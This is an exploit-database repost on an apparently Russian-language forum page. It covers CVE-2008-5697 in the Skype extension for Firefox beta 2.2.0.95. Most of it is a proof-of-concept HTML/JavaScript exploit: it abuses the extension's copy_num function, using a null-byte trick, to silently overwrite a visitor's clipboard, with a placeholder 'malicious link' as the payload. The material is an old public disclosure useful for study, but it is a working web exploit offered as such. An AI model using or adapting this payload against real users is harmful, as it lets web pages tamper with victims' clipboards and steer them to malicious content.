Exploit Skype Extension for Firefox Beta 2.2.0.95 - Clipboard Writing

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6690
Проверка EDB
  1. Пройдено
Автор
IRK4Z
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2008-5697
Дата публикации
2008-10-07
HTML:
<!---------------------------------------------------------------------------
 Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability PoC
 download: https://developer.skype.com/SkypeToolbars
 
 Author: irk4z[at]yahoo.pl
 homepage: http://irk4z.wordpress.com/
 
 greets: all friends 
---------------------------------------------------------------------------->
<a href="#" onclick="check_it();" >test it!</a>


<script type="text/javascript">

function copy_to_clipboard( text ){
	if (skype_tool) {
		var copy_it = text + '\0+'; //use null byte to copy value, because '+' char must be in string
		skype_tool.copy_num( copy_it );
	}
}

function check_it(){
	//copy_to_clipboard('malicious text!!!!!!!!!!!\n\n\n!!');
	//copy_to_clipboard('http://irk4z.wordpress.com/');
	copy_to_clipboard('http://malicious.link.to.bad.page/');
	alert('Done! Check your clipboard!');
}

</script>

# milw0rm.com [2008-10-07]
 
Источник
www.exploit-db.com

Похожие темы